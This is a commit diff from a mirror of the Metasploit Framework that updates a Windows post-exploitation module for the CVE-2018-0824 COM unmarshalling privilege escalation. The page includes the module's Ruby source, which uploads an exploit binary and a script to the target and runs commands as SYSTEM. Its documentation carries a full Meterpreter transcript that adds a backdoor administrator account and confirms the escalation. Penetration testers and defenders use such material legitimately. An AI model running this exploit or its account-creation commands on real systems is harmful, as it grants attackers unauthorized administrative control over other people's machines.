infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix exploit relics and documentation

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-10-23 17:15:34 -05:00
parent 927a29530b
commit 569c2e03c9
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
2 changed files with 102 additions and 70 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

145
documentation/modules/post/windows/escalate/unmarshal.md
View File

@ -1,5 +1,7 @@
## Overview
This is a post exploitation module for local privilege escalation bug which exists in Microsoft COM for windows when it fails to properly handle serialized objects.
This is a post exploitation module for local privilege escalation bug
which exists in Microsoft COM for windows when it fails to properly
handle serialized objects.
* https://www.phpmyadmin.net/downloads/
* https://github.com/codewhitesec/UnmarshalPwn/
@ -7,7 +9,7 @@ This is a post exploitation module for local privilege escalation bug which exis
## Module Options
"POCCMD" This command will be executed on successful exploitation.</br>
"COMMAND" This command will be executed on successful escalation.</br>
"SESSION" The session to run this module on.
## Limitations
@ -19,7 +21,7 @@ If the system is not vulnerable, then payload will execute but new process will
If you want to confirm the vulnerability before you add user or perform any other sensitive action.
1. `set POCCMD /s notepad.exe`
1. `set COMMAND /s notepad.exe`
2. `run`
Confirmation:
@ -30,82 +32,117 @@ If you see notepad.exe running as SYSYEM then that is as indication of vulnerabl
## Usage
```
meterpreter > getuid
Server username: PC2\test
meterpreter > sysinfo
Computer : PC2
OS : Windows 10 (Build 17134).
meterpreter > sysinfo
Computer : WIN10X64-1703
OS : Windows 10 (Build 15063).
Architecture : x64
System Language : en_US
Domain : PSS
Logged On Users : 12
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 2...
meterpreter > execute -f cmd.exe -i -H
Process 4868 created.
Channel 7 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
msf > use post/windows/escalate/unmarshal
msf post(windows/escalate/unmarshal) > show options
C:\Users\msfuser\Downloads>net user
net user
Module options (post/windows/escalate/unmarshal):
User accounts for \\WIN10X64-1703
Name Current Setting
---- ---------------
POCCMD /k net user msfuser msfpass /add && net localgroup administrators msf /add
READFILE c:\boot.ini
SESSION
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/escalate/unmarshal_cmd_exec) > show options
msf post(windows/escalate/unmarshal) > set session 2
Module options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
msf post(windows/escalate/unmarshal) > run
msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt'
command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true
verbose => true
msf5 post(windows/escalate/unmarshal_cmd_exec) > run
[!] SESSION may not be compatible with this module.
[*] exe name is: oQT0yWT834.exe
[*] poc name is: sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/UnmarshalPwn.exe
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_header
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_footer
[*] Starting module...
[*] Location of UnmarshalPwn.exe is: C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Location of poc.sct is: C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Executing command : C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
Query for IStorage
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] exploit path is: C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] script path is: C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] command is: net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Uploading Script to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Creating the sct file with command net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] script_template_data.length = 306
[*] Writing 376 bytes to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct to target
[*] Script uploaded successfully
[*] Uploading Exploit to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Exploit uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Launching Exploit...
[*] Query for IStorage
Call: Stat
End: Stat
Query for IMarshal
Call: GetMarshalSizeMax
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000020CA320CDB0
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000017F6C3E05B0
Query for IMarshal
Call: GetUnmarshalClass
Call: GetMarshalSizeMax
Call: MarshalInterface
[+] Exploit Completed
[*] C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Post module execution completed
msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > execute -f cmd.exe -i -H
Process 1780 created.
Channel 11 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
Confirmation
Back in Meterpreter Session
meterpreter > shell
Process 3936 created.
Channel 185 created.
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\temp\un>net user
C:\Users\msfuser\Downloads>net user
net user
User accounts for \\PC2
User accounts for \\WIN10X64-1703
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
User msfuser sshd
sshd_server test WDAGUtilityAccount
The command completed successfully.
Administrator DefaultAccount egypt
Guest msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
egypt
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>
```

27
modules/post/windows/escalate/unmarshal_cmd_exec.rb
View File

@ -5,13 +5,11 @@
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
# include Msf::Post::Windows::Priv
def initialize(info = {})
super(update_info(info,
@ -58,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Local
def setup
super
validate_active_host
@cmd_to_run = datastore['COMMAND']
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@ -73,16 +70,14 @@ class MetasploitModule < Msf::Exploit::Local
password = Rex::Text.rand_text_alpha((rand(8) + 6))
print_status("username = #{username}, password = #{password}")
cmd_to_run = 'net user /add ' + username + ' ' + password
cmd_to_run += ' > C:\\\\Windows\\\\Temp\\\\testoutput.txt'
cmd_to_run += ' & net localgroup administrators /add ' + username
cmd_to_run += ' >> C:\\\\Windows\\\\Temp\\\\testoutput.txt'
print_status(cmd_to_run)
return cmd_to_run
end
def validate_active_host
begin
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
print_status("Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
@ -129,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
script_template_data = ::IO.read(local_script_template_path)
vprint_status("script_template_data.length = #{script_template_data.length}")
full_command = 'cmd.exe /c ' + cmd_to_run
full_command = cmd_to_run
full_command = full_command
script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
if script_data == nil
fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
@ -139,9 +134,11 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status('Script uploaded successfully')
end
def exploit
if cmd_to_run.nil?
def run
if datastore['COMMAND'].nil?
cmd_to_run = populate_command
else
cmd_to_run = datastore['COMMAND']
end
print_status("exploit path is: #{exploit_path}")
print_status("script path is: #{script_path}")
@ -159,20 +156,18 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status('Launching Exploit...')
command_output = cmd_exec(exploit_path + ' ' + script_path)
vprint_status(command_output)
print_good('Exploit completed, wait for elevated session')
print_good('Exploit Completed')
ensure_clean_destination(exploit_path)
# ensure_clean_destination(script_path)
ensure_clean_destination(script_path)
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_good('Command failed, cleaning up')
print_error(e.message)
ensure_clean_destination(exploit_path)
# ensure_clean_destination(script_path)
ensure_clean_destination(script_path)
end
end
attr_reader :exploit_name
attr_reader :cmd_to_run
attr_reader :script_name
attr_reader :temp_path
attr_reader :exploit_path